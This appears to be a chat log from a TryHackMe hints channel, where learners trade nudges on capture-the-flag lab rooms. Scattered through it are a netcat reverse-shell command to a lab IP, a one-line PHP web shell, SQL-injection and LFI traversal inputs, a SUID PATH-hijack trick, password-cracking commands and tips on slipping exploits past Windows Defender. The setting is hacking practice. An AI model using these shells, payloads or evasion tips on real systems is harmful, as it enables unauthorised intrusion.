#room-hints

hi, guys im doing linux agency (i'm currently in as the user viktor)
and i'm just wondering when || when i want to give myself a shell using the crontab i first tried this command "nc -e /bin/sh 10.6.47.204 9999" but it didn't work || but why is that ? knowing that nc in installed on the machine+

maybe the ver of nc that is installed is the ver that has that flag removed??

what do you mean?

there are 2 versions i dont know which is new or old but one ver has that flag the other ver removed that flag

what flag are you talking about

||-e||

oh

ok now i understood what you said before

yup that could be it

i used the long version of nc reverse shell from pentestmonkey' cheat sheet

i used it too but it didn't work somehow
the bash one worked tho

need some help in the cc: pen testing room 🙂

ok

didnt know that but i do know sometimes its there and sometimes its not

like you said depends on how it was compiled

Hey can someone explain me what happens when you add a domain in the /etc/hosts file?(Iam trying out archangel room)

I googled for you cos it would be faster than explaining

https://support.acquia.com/hc/en-us/articles/360004175973-Using-an-etc-hosts-file-for-custom-domains-during-development

this mostly covers it

Got it thanks man

so it's simply a redirect for an IP to a domain name irrespective of taking it from the DNS records correct?

Ok yeah got it, that's a wrong word.

Understood.

Hi there

Room Nmap
Task 14
Xmas Scan

i run the command for scan but i dont get any result
namp -sX -p 0-1000 "target machine"

the ip may have been expired

or you did that scan too early

it's buggy sometimes

well if you think about the question

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

based on the result you got, what do you think a possible answer could be

Thank you, the guys gave the clue about what's going on

😉

Hi guys...
Any help on Linux Agency mission25? I'm trying for an hour now, but nothing...
||The only strange thing is in .viminfo file, missing a "5 LINE :||

what's a word used for when you move goods out of a country? you ________ them

||export || ?

then once you have that word, think of how it's used in linux

and maybe try using || ltrace || when you run the binary

hmmm.... I'll give it a try. That's the problems when english is not your native language 🙂

|| ltrace || gives you everything you need

I'm using smbclient on a kali vm, any idea how I would open this file, Working From Home Information.txt ?

It doesn't seem to be liking the fact there are spaces in the title of it

you have to escape the spaces, that is, put a \ before them

so "My file name" becomes "My\ file\ name"

graaah toc2 is teasing me. I am sure I have the right way of getting the foothold but not working as expecting (just letting steam out here - I know rule13)

keep at it, you'll get there

hopefully. I am missing some piece of the puzzle.

Awesome cheers!

I think I'm over thinking this one - the rest of the questions seem rather easy but finding who the profile folder belongs to is confusing me like mad

ahh got it D'OH! spelling bleeping error 😄

it happens, i was doing one of the boxes recently and kept on killing the server with a wrong log poisoning attack, over and over and over and ...

sounds like one of the new boxes a few days back

yup, was a typo in my attack, must have read it and reread it a half dozen times before I noticed lol

hi, guys im doing the dogcat room
i used gobuster and found a directory called flag.php but it's empty
i tried LFI but nothing helps
what should i be doing?

more LFI 🙂

that is the way

if you want a bigger hint then || sometimes you have to go forward to go back ||

lol

i tried alot of "../" etc/passwd but the didn't help

i also tried the null byte

that's where my second clue comes in

there is a way with LFI to pull out the source of a file with ||base64||, try googling for it

i tried that too but it didn't work

there's a link "http://10.10.213.207/?view=dog"
and another "http://10.10.213.207/flag.php"

i tried all the exploits on the dog one

can i do something with the flag?

did you find any directories when you gobusted?

and no, the flag.php will be needed later, this is not the way

what message do you get when you try to do lots of ../ + etc/passwd?

Sorry, only dogs or cats are allowed.

hmm

sounds like

you need to try and bypass it

ok, so that's a message coming from the code right, must be some sort of check on what you entered

oh

now re-read my first spoiler-marked hint again 🙂

toc2

Not yet.

oops didn't mean to type in discord

ugggg don't you just love it when you are in the middle of compiling a exploit to upload to a machine and the time expires on a deployed machine

when running the root script on chocolatefactory, || do I need to enter the 'key' in its decoded format? or enter it as is ||

i think it was as is

i could be wrong

ah it worked, ||turns out I needed to enclose it in quotes ||

encoded or decoded?

as is

i thought so just wasn't 100% positive

@frank snow strings is good for you

hello brothers

i really need some help

i am new to try hack me

working on cyber defence

and stuck on sysinternals question about streams

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

sorry.

I need assistance on:
Network Services 2
Task 10
Question "Now we need to crack the password! Lets try John..."

What i have done:
||Taken the hash EA031893AA21444B170FC2162A56978B8CEECE18 saved it as a .txt. ran the hash through hash-identifier showing SHA-1 & MySQL5. From this I ran the hash.txt against john the ripper sudo john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt /home/joe/Documents/mysql_hack/hash.txt however i just get a scrambled mess. So I try john hash.txt but it never finds it.||

Any assistance is greatly appreciated.

From what you've given you've missed a * off the hash. You might also use ||mysql-sha1|| as the format. Fix those and it should crack in seconds

Thank you, I was going round in circles and thought the * had no significance which is why i removed it.

All the little things matter - The Wire 😀

I am curious does every hash need to start with a * before running it through John? or is it just certain hashes?

Nope. They come in many forms and sizes.

brilliant, I'll update my notes

Try Hack Me has a few good hash cracking boxes which will show you more.

hey

can anyone help me with room linux agency

flag 25 hint

I cannot find a room called 'linux agency` PSB
#room-hints message

https://tryhackme.com/room/linuxagency

Unfortunately I cannot help as I have not completed that room, but im sure that someone might be able to assist you. Thank you for providing the link.

Ok

Hint is don't follow any write-ups you might find as it's changed 😀

Ok I really stack in flag25 @ LinuxAgency. All other flags, found easy in a matter of seconds. But this is hard, at least for me. Not even with the || ltrace || hint I've got from here.

same here, tried giving an argument to the binary, but nothing. I don't have to analyze it with Ghidra, do I ? Seems to complex compared to the flags before

seems to have to do something with ||ltrace|| command, but I cannot find what.

Got it

look up what ||getenv|| does

@sleek wolf

says there is no such command

Its a php thing, you see it when using ||ltrace|| on the bribe binary

grrrr ... any other option? still I dont gotit

So you know what ||getenv|| does?

I google it. I found ||ltrace -e getenc ./binary||

I mean that you have to find out what it does in the binary, or in php in general

I'll search more....

just typing in the command in google and reading the first lines of the first result did it for me @sleek wolf

witch command you mean?

||getenv||

I know I'm close but...

especially the first line there

in the pic

Hey guys!
I'm doing AoC2 day 14, and already found the pictures from Rudolphs parade, but I can't find any exif location data, I've already tried reverse image searching for higher resolution images, but none of them had the location data, any hints?

@sour lintel try first off using https://29a.ch/photo-forensics/#error-level-analysis it has a few tools that can help maybe (it has geo tools)

There's a higher resolution image elsewhere on the page iirc

Good, I'll find that!

I didn't used hint but now the hint given on Tryhackme itself does the job..

👍 good work. I might go back and try that 3rd way later!

You did by rev engg tools ??

Hey, I am having trouble answering a question in a Sysmon room. It is the Task 4 question: "What is the UTC time created of the first network event in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx".
I have run this command: ||Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx -FilterXPath '*/System/EventID=3' -MaxEvents 1 -Oldest||
It returns: ||1/6/2021 1:35:52 AM||, but it is not the correct answer.
If I run Get-TimeZone, it returns UTC so shouldn't need any time conversion.
Placeholder for the question is: ********** :**:**.***, which is a bit weird.
So I have tried filling in the zeros like so ||01/06/2021 01:35:52 AM||, but that is still wrong.
Then I tried ||01/06/2021 01:35:52.UTC||, no success. I also tried swaping year, day, month around but still nothing. Oh, and i have also tried putting in the newest log time with that filter and no luck. Any suggestions?

Yup. Not the smartest way, but ultimately effective.

how can i take advantage of a custom SUID?

Need to find out what it does to see if the suid has any exploitable behaviour.

it uses || date, so i edited the path and ran my own "date" script which invokes a bash shell||

thanks for the help

just a heads up, that's a little spoilery for this room

Hello there. Need some help in the Room: Relevant - pentesting challenge. I found out a way of reaching nt authority based on a set of priv available and i have indeed an exploit. But for some reason it doesn't run in the machine. I compiled it to 32 and 64 versions but none of those run on the machine (but it runs locally). Any help is appreciated.

it's almost as if windows had some sort of protection against privilege escalation 🙂
try running this command ||powershell Get-MpThreatDetection|| and see if you can find your executable on the list

it returns empty :\

but i do have a certain message: The system cannot execute the specified program.

ok, basically windows defender blocks those commands

so you need to keep googling for a more recent exploit that isn't detected

got it

will look into it

thanks!

ok, that's a mess, let me try again lol

careful with the dir :p

If a password hash starts with $6$, what format is it (Unix variant)?

ActionSuccess                  : True
AdditionalActionsBitMask       : 0
AMProductVersion               : 4.10.14393.0
CleaningActionID               : 2
CurrentThreatExecutionStatusID : 1
DetectionID                    : {478980A0-C8B8-4D26-9C01-E651A73C41BC}
DetectionSourceTypeID          : 3
DomainUser                     : IIS APPPOOL\DefaultAppPool
InitialDetectionTime           : 8/24/2020 1:42:58 PM
LastThreatStatusChangeTime     : 8/24/2020 1:44:04 PM
ProcessName                    : C:\Windows\System32\cmd.exe
RemediationTime                : 8/24/2020 1:44:04 PM
Resources                      : {file:_C:\inetpub\wwwroot\XXXXXXX\JuicyPotato
                                 .exe}
ThreatID                       : 2147757908
ThreatStatusErrorCode          : -2142207965
ThreatStatusID                 : 3
PSComputerName                 : 

it is weird because if i try to run it in the PS i get 'failed to run: The file or directory is corrupted
and unreadableAt line:1 char:1'

If a password hash starts with $6$, what format is it (Unix variant)?

You can find it in hashcat example hashes page

not sure why that is. Keep looking and you'll find another exploit that needs compiling, post here and i have a link to an already compiled version

roger that, will try to find another one

Anyone to help with MITRE ROOM. Task 7. Last 2 questions

For the crack the hash 1 room

For the bcrypt hash, the hint specifies trying "other methods that start with b"

Its just none of the other methods that start with 'b' make sense for the hash. Like the example hash doesn't line up with the question hash

I can't finish day 14 of AoC, as I need to access Scylla.so and it's down, is there another alternative (that it's free?)

Or maybe I could get to the leaks myself, I've found half the password in BreachDirectory, but this is it...

Actually, I've sent a message to the maintainer of Scylla but still didn't got any response (I believe that is way too much isn't?)

https://tenor.com/view/sense8-hysterical-ah-help-panic-gif-8774568

Both the answers are there on the site. The first one is written in a block of text so you have to read carefully to pick it out. The second, there are boxes on each page listing the affected platforms. Look there

Thanks, I will read the text once again

every time i terminate my machine and re deploy it in linux agency task 4 i have to privsec -4 users every time to get the next one its is it only way o do that or is there any other ways to login s the user where we terminated the machine and also i know the flags of all the prvious users

you can check what users can SSH into the box, then once you get one of those you can so straight to it, just tail /etc/ssh/sshd_config

some more explanation would be really helpfull

more explanation on what? did you tail the sshd_config file?

how to check what users can ssh into the box

but that's what the command I gave you does

if you run it you'll find a list of users that can SSH in

ohh ok sorry thanks

will i'll be able to get the shell of users if they are there and if they are not do i have to start from viktor and continue privsec till the user i terminated the machine

no, if a user is on that list and you have already found their password then you can go in directly as that user

sure thanks a lot

hi how did you fix the issue? any idea what is causing?

@median compass got it

tried to get a compiled version of my exploit (after trying to bypass applocker) and found a version of it

for some reason my own compiled version gets locked

and this one doesnt

=\

defender is looking for encoded sequences, if enough people use msfvenom (or whatever) to encode an exploit then the same strings get created and eventually associated with the exploit. a different encoding or way of doing something can then slip past until it in turn gets well known and used often

yeah but in my case i just grabbed the project and compiled the exe

same size, same arch

the one i got after searching is the same thing, so something i am doing in VS is flagging it

maybe because i am using a newer windows sdk or something

(the project from the exploit)

anyway, thank you vm for the help 🙂

from what i can remember, i finally used another tool.

Do not provide or ask for help or hints for Classic Passwd room until 10th Feb, 7pm (GMT)

No. From Viktor to Penelope you're flying without authentication. Drop out and you have to go back to Viktor and privesc through each user in turn. Most of them should be solved pretty quickly tbh, if you don't make a drama out of it.

Does anyone know if hydra is possible to use on Jenkins? (doing Internal room rn) but yeah when i cURL i get a Crumb error which supposedly is linked to the current user session but nothing appears in dev console, so it's server side?

The catch is - you don't have the passwords until you get given one later, so it's a bit of a moot point.

Eh... Hydra should be a last resort

I'll just use Zap i guess

hey does anyone know of in "The Marketplace" room we need to use hash cracking for the bcrypt hash?

@carmine frigate no cracking required

just rooted the "BioHazard" box, and I dunno if I'm just being stupid but I can't answer one of the last questions to be able to mark the box as complete...

@quartz grove should just be the root flag, no?

no, it was lame... I just figured it out

it wasn't the root flag it was one of the questions

Glad you did. Im actually gonna do that room, looks interesting

it was OK, bit too CTFy though

Oh well. Root it anyways.

waaay ahead of you 🙂

<?php system($GET_['cmd'])?>

what does that do?

does there have to be a cmd file for that to work

basically just spawns a cmd process as a GET request

ah alr

thanks

I got at the ||cms installation page|| on toc2 any hints what to do further

when you do anything with php and you don't understand about them, let search it, read php docs php.net .
if you input: ls and that mean: $_GET['cmd'] = ls, code will be: <?php system('ls') ?>

in linux, this command will list all files and directories in your directory

@candid nimbus I tried but no luck. Please share the link which you are referring to. I am doing something terribly wrong. Stupid to ask but I am looking for answers

I think that's still embargoed until later today. Might be a good exercise to fill in the time by researching the app and see what you can find out about it.

rthanks i was making sure the same in my querry i make a lot of typos so i keep losing the shell

it's still a bit early I think

Okayyy no problem will give it another grind

So you should have found an attack group and something you should focus on. If you click the link for the something you should focus on there is literally a one liner that contains the 1st answer. The 2nd answer is in the box at the top on the right.

You can't

Not until it's approved on the room

Ok, glad I asked before spitting out the link. Thanks @stuck fractal

Rule #14... gotcha. slaps own hand

I suggest trying out https://tryhackme.com/room/lfibasics

it does teach you about 'directory traversal' but you should recognise it a bit as 'path' like if you cd ".." it takes you back a level

seems to be a common technique in LFI based vulnerabilities (I haven't done archangel yet, never gonna give it up tho).

There is nothing to look for bro
Still thank you

Thanks a billion. I got it and also the mistake of looking for inside RULER instead of CLOUD Accounts

you can read the source code of the page you're accessing, using LFI

sure, pm

I deleted that because it was a massive spoiler.

Hi

Hi guys, i am doing the beginner ctf called "linux Challenges". I allready having problem with finding flag3. The question ist:Flag 3 is located where bob's bash history gets stored? - isn't it stored in /home/bob/ ?

That's not Linux Fundamentals

That's Linux Challenges or linuxctf

oh, your right. sry i will change it in my question

It's stored in that folder, sure

I cant send dpic's but it's not there

It is

If you are the correct user and look in the correct file

i'm bob, locking in /home/bob

can you only tell me is that correct?

That is the correct folder. But you need to look in a file.

thank you

i will try

oh wow. that was so easy... shame on me 😄

sorry, but i have to ask again. I do not get the right "find" command to get flag5 of "Linux Challenge" can some body give me a hint? These are some of my try's: find /, find /home/bob, find/home/garry, find / -name flag5, find / -perm g=w,...

What's the task, sorry?

Find and retrieve flag 5. xD

Well, knowing the name of the file is hard and essentially the key here.
First, I would highly suggest to put 2>/dev/null on the end of your find commands as this will filter out all the Permission denied errors.

As you do not know the flag file name, I would suggest using the third command but replace the file name with flag to widen your search, if it does not find a file named flag5.

thank you so much. I will try get the flag with this information.

got it, my fault was to search for -name flag5 and not -name flag5.txt

Hah, completely missed that.

now i've learned it xD 😄

Hi guys

What means "send money to another country"

I am trying to Solve mission25 un Linux agency room

If you are still stuck on it, it is a play on words for an app that can be used to transfer money

hello all 🙂 Anyone available to help with the Sysinternals room?

Which bit are you stuck on?

"Using WHOIS tools, what is the ISP/Organization for the remote address in the screenshots above? "

I tried the both addresses in the screenshot but the lookup fails

when I try, it returns "The requested name is valid, but no data of the requested type was found."

Hmm, never had that problem when testing it, maybe use an online whois tool

huh..thanks! That did the trick

I used domaintools and it worked...wonder why it didn't work on cmd 😦

well thanks ^_^

😦 @astral smelt any advice on why the last question won't accept the correct path?

I still stuck on ... I am not sure . Someome told me Is similar proceda to export but not clear ...

nvm about my issue...I fixed it 😛

This stumped me for a bit too... maybe look at the .viminfo file. Read the code and try to figure out what it's trying to "compare"...

It puts the money in the pocket :)

Any hints for classicpasswd??

It's not open for hints yet

72 hours from release

Reverse engineering is hard

Do a try hack me reverse engineering box in the meantime then. Should teach you everything you need to know 😀

go do one of the other RE rooms and get acquainted with the tools. They will do most of the work for you in the classicpassword room and make it easy for you to solve

Hey people!!
Did someone manage to solve the physical security intro room?

I am at the last question, the one about Adams Rite Hardware and I don't get it. I mean I know what to do to prevent the bypass but I can't find the word for it. I am also not a English native so that makes it a bit tougher.

Anyway, really cool room but super hard to solve 😂😂

Hints are really appreciated🙏😊

It has to do with what a knight would carry .. and is on some types of Cat cable

I would go with rockyou

Thank you ❤

anybody help me out with overpass 3 having trouble ||mounting the share|| tells me ||nfs file type and transmission protocol|| are not valid

There is a knight 😂

Try rockyou then ;-)

Search here in this discord server for that question, there are big hints around

It's in my rockyou.txt 100℅.

Thanks ❤

Woopie I found the answer, thanks to both of you ❤

||mnemonic room . i am stuck after sshing into james . still dont know what this supposed to mean . HINT ! ||

nvm found it

Hey, I have a question about Simple CTF room

Hello guys, can anyone give a nudge for retro?

Which part are you on?

find hidden directory and now enumerating but couldn't find any userful thing ):

If you keep looking you will ||find creds on that secret directory ||

thx for the nudge will do

Do the exploits from searchsploit need to be edited for syntax?

In the Simple CTF room?

No matter what version of python I run it on, it gives syntax errors and won't actually do anything.

Iiirc that's python2 for SimpleCTF

Correct

Read the error.

If you don't know the error, google it

Because that one very clearly is not a syntax error 😉

Ok, so it's missing a module. Seems weird for a THM Attack Box.

As many different exploits require different modules, the AttackBox dev (CMNatic) isn't going to install them all, you can request it in the feedback form although #feedback-and-ideas

Awesome, thanks!

if you don't mind I would be interested in seeing your cnsms.py code

It's the code from searchsploit. I just copied it and renamed it to something easier to remember.

ok was just curious cause if its the room i think it is i don't remember using searchsploit

What'd you use?

if its the room i think it is i just installed the cms to get revshell then lxd to priv esc to root

Nice!

Didn't think of that. I searchsploit evvvverrryythinnng

lol i was just curious cause it was an interesting command you were running

Ahh, ok! One sec.

https://www.exploit-db.com/exploits/46635

cool

i am doing the Linux Challenges in Linux Fundamentals. I am searching for flag 23. I found it but i have to reverse it. I don't know how to do so. Can some body give me a hint?

There's a command you can use to reverse it and please don't post flags

thank you, i will search for it.

Anybody for hint on the first question on the AWK section in the room https://tryhackme.com/room/linuxmodules ? I got the second one already, and the first one I get the same output than the question asks for but the first curly braces contain 6 extra characters I'm not using and can't figure them out. Tried reading the manpage of awk and the tutorials the creator links in the exercise but there is no way I can figure the answer out

^^^ ah nvm, finally got it lol

i found a filter.php file in the "upload vulnerability" room, how do i look at the source code

or is this a rabbit hole, me trying to get this file ?

can I get some hint on Linux Modules https://tryhackme.com/room/linuxmodules task 09? I have used sort and uniq and cat them with '-n' flag. But I keep getting the 2271st word and the line number of word 'michele' not correct. I checked the result and words are sorted. Find it a little hard to figure out what I missed

ok nvm, I solve it with kali linux. Originally I tried this on wsl ubuntu and the sorted result seems to be different from different os. idk, maybe I should take some time on those

okay now i got it. Its my $LANG being 'C.UTF-8'. I changed it to 'en_US.UTF-8' and I get the different result. anyway this is a very good room to learn and play

does anyone have idea about this ? It's in the Convert my video room !! Tried www-data , apache but didn't work

what other users are on the box

cat /etc/passwd | grep sh is a good trick to see anyone who has capabilities of getting a shell

@blissful musk

@storm venture tried all those users , but it didn't had the correct one !!

that's odd

the number of characters doesn't nearly match any of those users

are you sure there's not another account on the box

you could also do ls -la /folder/.. | grep folder to see who owns it?

has anyone tried toc2, I'm stuck at root and can't understand the ||readcreds.c|| code

@storm venture Got it !! There was a hidden file in which there was the username , thanks for helping out 🙂

nvm got root, with the intended way

ayy nice, good job @blissful musk

i could never get that race condition to work but its not needed to complete the room

Would love to know the way you got root

user is part of a certain group the is easily exploited

Glad you liked it 😄

Interesting. I just poisoned the config.php file during install and got a shell that way.

Hmm...another interesting technique that I'll have to look into.

Took me a bit of fiddling and moving args around to get them accepted. Creating the commands were pretty easy - getting them accepted were the hard part 😂

lol nice!

I never even noticed it at first and did it the same way as you. Had to redo the room to get a bit of the race fun. It seem like it does not work if you point it to read the link but will work OK with the actual file. Dunno why, because the video shows the opposite.

oh ok i was going off what liveoverflow was doing in his video will try again when i get home from work tonight

At least that was my experience when trying

for the network services 2 room
"Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?"

what command should I be using for that?

nvm

kinda confusing cause just ||showmount -e [ip]|| worked

the /usr/bin/showmount is the absolute path if /usr/bin/ is in your $PATH the you can just use the relative path with "showmount"

Alright, thanks Knight

Well known ports? Says 0-1023 online but when I type it in says wrong, any suggestions 😂

Typed 1024 it worked 😂

not complaining just explaining if you do a which showmount and it shows somewhere else then the relative PATH that they are telling you to use it won't work just saying not judging 😉

i know typing is not my strong suit lol

good day all, got a question about OWASP top 10 task 18 part 3.... Is it broken? Because outside of the first page they DIRECT me to, every other page I try come sup blank, got all the way to 100.... BLANK

Anyone else have this issue?

also after x amount of tries the room just stops responding

I got the answer i needed but why did running the same command twice produce different results what is the reason for this? here's the permission changes from download to me reaching the desired result

the last two images are the ones in question

its something to do with suid permissions

s' If the setuid or setgid bit and the corresponding executable bit are both set.

S' If the setuid or setgid bit is set but the corresponding executable bit is not set.

https://unix.stackexchange.com/questions/28363/whats-the-difference-between-s-and-s-in-ls-la

now as to why you would have to run the command twice for it to go from nothing > S > s I'm not 100% but its probably related to how they work

maybe because you didn't specifcy +xs

Hi guys,
I am at the beginner Pickle Rick room.

So far I:

||looked around with a browser and found:

In / (root) there is a comment with username:
R1ckRul3s

Server:
Apache/2.4.18 (Ubuntu) Server

(I searched about this version and found that it is vulnerable but no exploits in exploit-db)

=======

used nmap and found:

open ports:
22 ssh
80 http/website

hidden directories:
/assets not hidden, but it is a directory
/robot.txt nothing interesting
/login.php input fields

=======

used Burp Suite Community Edition (free) (learned to use Proxy and Intruder from outside sources due to paywall in THM):

basic SQL injections didn't work in /login.php:
' or 1=1--
R1ckRul3s'--

DOM-based XSS not working
XXE not working (or at least I think so)

no cookies that are revealing anything

right now I am at the painful process of brute forcing using intruder which stops searching after ~70 trys (and I have to manually remove the tried passwords, cancel the unmoving attack and start a new attack) because it is the free version. I am using best1050.txt. At the time of writing it reached letter m but I doubt brute forcing will yield a result at all.

=======||

Right now I am kinda stuck.

Please point me in the right direction.
Is there something I am missing?

Thanks in Advance!

Are you sure robots.txt isn't interesting?

BURRRRRRRRRRP! I think morty you need to check the robots! they have guns!

||no way this is a password|| let me check

lesson learned, thanks!

hey i have base 64 executible file i have to decode it there was a cmd to do so starting from echo can any one tell me that cmd

Room task question.

i am linux agency task 4 maya flag i want to decode a executible base64 file how to do it

does the normal base64 -d not work?

@distant tartan

or does it not work with exeutables?

i did it although thANKS FOR HELP

a vs caps lock

HAHA

i had to set up a variable to the file to execute it from simple echo 'base_64' | base64

Do not provide or ask for help or hints for En-pass room until 13th Feb, 7pm (GMT)

hey guys i need some help in nessus room
i deployed the machine and ran the basic network scan
and only 3 vuln got displayed
i did the scan couple of times but i cant see the port scanner option anywhere or any apache server version
plz help

what are you using? nmap? you can do sudo nmap -sV -sC <ip here>

im using nessus

idk then im only good with nmap i can go look around tho

that would be great then

btw what vuln info are you gathering, or are you just trying to see all of it

the question said that port scanner tab will be dispalyed where it should display the apache version

but i didnt get any tab

I can just give you a few common versions of apache used in ctfs

2.4 is common..

the problem is that it should be displayed
why isnt it
what did i do wrong

idk... can you send me the challenge link

yeah

https://tryhackme.com/room/rpnessusredux

uhh new room today.

while I'm checking, go around looking for apache versions I think it might be something like 2.3.xx 2.4.xx

yeah sure

or like 2.xx.xx but its probably 2 as the first number

@tranquil ivy whats the ip your trying to scan?

@tranquil ivy also what version of nessus are you running?

the victim ip

8.13.1

ight

yeah

have any of the apache versions worked ?

rn I'm getting my nessus set up

nope

odd...

how long did you wait while it was scanning

around 8 mins

@tranquil ivy odd I just scanned and looked through somethings and found apache version ||2.4.99||

^^^^^^ and it works use ^^^^^^^

how what did u do???

u used nessus???

ye i used nessus, idk what

i did i just randomly did stuff

that was my first time using it, but i guess it worked

https://tenor.com/view/mission-impossible-we-got-this-you-got-this-aja-oh-yeah-gif-9140872

how

well I did a scan and I went to a nessus tutorial and clicked a few things and found it

what did u get in the scan output?

how do I check that? I closed my vm

home page

btw it should have had all the info

on the challenge page

hmmm

here I'll go screenshot the output

btw if you need to theres always no harm in going to writeups @tranquil ivy

i did but the outputs were different displayed than what i had
doing same steps

heh nice to see that I am not the only one finding the new room more difficult than the label... one got through sofar.

here did you get this ?

Hey guys I am trying the Linux Modules room and at task 6 at the first question I managed to have that output but it doesn't accepts my answer and my answer differs from the placeholder.. Any help ?

nope

well basically inside that theres a apache version vuln you can check and find it

yeah but i didnt get this

output

did you do a basic scan, have schedule enabled, and did you scan alot of ports or just a few?

basic scan
all ports

did you look inside the results the scan gave you, they could be in there.

checked everything
no result

odd......

can you do the scan again quickly and I'll walk you through it?

yeah ok

btw did you do a host discovery scan?

and basic network scan after that?

then do credentialed patch audit

noope

ok i will do that then

@tranquil ivy and when you do basic network scan do patch audit scan then a web application test if that doesnt work btw

did it work?

https://tenor.com/view/was-that-too-small-of-a-hint-moz-mckellan-anthony-alabi-family-reunion-do-you-not-get-it-gif-18450418

doing

mmk

https://tenor.com/view/rob-phiips-below-deck-indiana-jones-im-like-a-nerdy-indiana-jones-gif-19810061

btw just dm me if you need anymore challenge help, I'm not on often tho

^﹏^

yeah sure will

ight I'm gonna go help the guy in room help bye!

yeah bye
n thnx

must be too tired for the new en-pass room. I am missing something obvious. It is supposed to be easy 😄

@gusty kite same here

suspect it is just in front of us - laughing

you and everyone else who tried. There is no way no one could found a solution in an easy room

🤷‍♂️

Yep not really speaking for good room quality IDK

but one person finished.

That makes it even more weird IMO

yeah

stuck to..... think it should medium from the bits I have done so far :/

The only "hint" we got is that we are missing something really obvious, so i don't know how could i help you since only one has rooted the box

Is anyone no the en-pass room

Check the latest pinned message!

Im not so familiar with discord

Where is that

middle icon

Hi can someone give me a hint for root on gatekeeper by themayor?

top right beside the search bar

Yeah i saw it

What do you have so far?

Me or elbee

NVM

I was talking to elbee @green brook

@light hemlock ive got my shell, ive used winPeas and metasploit exploit suggestor, just having trouble finding the privesc point and ive enumerated alot.... must be missing something

Try using another module from metasploit for enumeration

@rose cape https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/

thank you

❤️

@cursive star @gusty kite, mind DMing me with what you're doing in enpass?
I can check against the writeup to see if there's a problem with it 🙂

I got it @inland onyx thanks!

Awesome 😄

Can I DM? @inland onyx

You can, but if it's confirmed to be working then there won't be any hints 👀

No I'm not asking for hints

I got the 1st part though in a way I didn't like. I'll explain more in DM

maybe you can help!

In the burpsuite room the instructions say "Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header."

I can't find any with 'Set-Cookie', only 'Cookie'.

Have I done something wrong in a previous step or is 'Cookie' and 'Set-Cookie' the same?

It sounds like you're looking through your requests instead of the responses

Oh, thanks.

anyone on En-Pass room ?

I hit a bit of a snag on it myself, so I'm setting it aside. But, since it's a newly released room there's the no help/hints policy in place.

ok

dm

I'm also stuck with the pass in hand from reg...

Don't know what's wrong but the "windows/smb/ms17_010_eternalblue" exploit is failing constantly in the Blue room's target VM

does anybody have any idea what to do there ?

Similar thing happened to me a few days ago...I left it as I thought i would come back to it

same

@dawn mango Not yet.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

ohhh So before time it is not possible?

No. You're just not allowed to ask for help or hints before 72 hours have passed

opsss sorry. Thanks for the rule.

yeah, I've had a couple of issues with it, how can I help though?

I think we can agree that this part is not properly implemented just a „fake“ implementation.

I've got a thing but am missing one critical piece of info

I'm assuming that the encoded bit is useful, but doesn't seem to be

lol, yes!!

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

@crisp burrow Don't ask for help or hints until 72 hours have passed please

Please don't ask the same question across multiple channels

Sorry my bad

Hello anybody wanna teamup to "En-pass" and "Keldagrim" ? 🙂

#689615473620287603

@white salmon I'm on En-pass atm

What command can we run to find out more information regarding the current user? in meterpreter shell and it is a windows machine

That sounds like a research question

There's a great page of meterpreter basics

I am in the metasploit room

Ok

Doesn't matter

I recommend research

Under rule 13 specifically

should I specifically search for meterpreter shell or windows cmd commands?

You're in a meterpreter

yup

I recommended a page to look for.

got a page of kali for meterpreter basics

Ok, so have a read

Research involves a lot of reading and googling

And you NEED to do it before asking here

Thanx that u did not help got the ans😁

That's incredibly rude

yeah I did it but nothing much on google

There's plenty.

after u told search for meterpreter I got a useful page

anyway thanx

You should be doing research before asking here. Rule 13.

kk will remember that

no hints for that room yet

72hours till hints unlock!

that's not a hint am asking... just wanna confirm...

umm nvm I'll wait then

It is tho

are we able to ask for hints yet on Linux modules room?

Yes

Yep, it's a walkthrough

need a hint for task 6 Download the above given file, and use awk command to print the following output:

ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234

i put

awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt

and it had given me the result.. but it seems not to be correct for the question

that query did output ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234

Yes, I added a hint for that... You need to use FS before OFS. It isn't required tho... But I added it to the solution because I want the others to practice using FS variable too.

i been stuck on it for past 2 days

If you remember, FS is used as a field separator... for inputting the data from either stdin or a file (may be redirection)

is that your room? great room btw, very handy info!

thanx ❤️

No need to stuck, just append FS=" " before the OFS command

and it will accept the answer

cool.. thanks for that

np 😉

i had been looking at hour long videos on AWK and that and racking my brain bad

on youtube

thanks for that !

did you click the hint button

lol

hey, which is good... coz i think you must have gained a lot then

yeah a bit i guess

more the merier, ping me anytime if you need any more help

yeah that one threw me for a while too

and then I

Hey can you give a hint for task 9, second scenario

I'm getting the result crct but not able to pass the question😅

what command did you exactly run?

ls | carga -n1 -t -I word sh -c '{ echo word >> shortrockyou.txt; rm word; }'

xargs*

What task were you on exactly?

Your friend trying to run multiple commands in one line, and wanting to create a short version of rockyou.txt, messed up by creating files instead of redirecting the output into "shortrockyou". Now he messed up his home directory by creating a ton of files. He deleted rockyou wordlist in that one liner and can't seem to download it and do all that long process again.

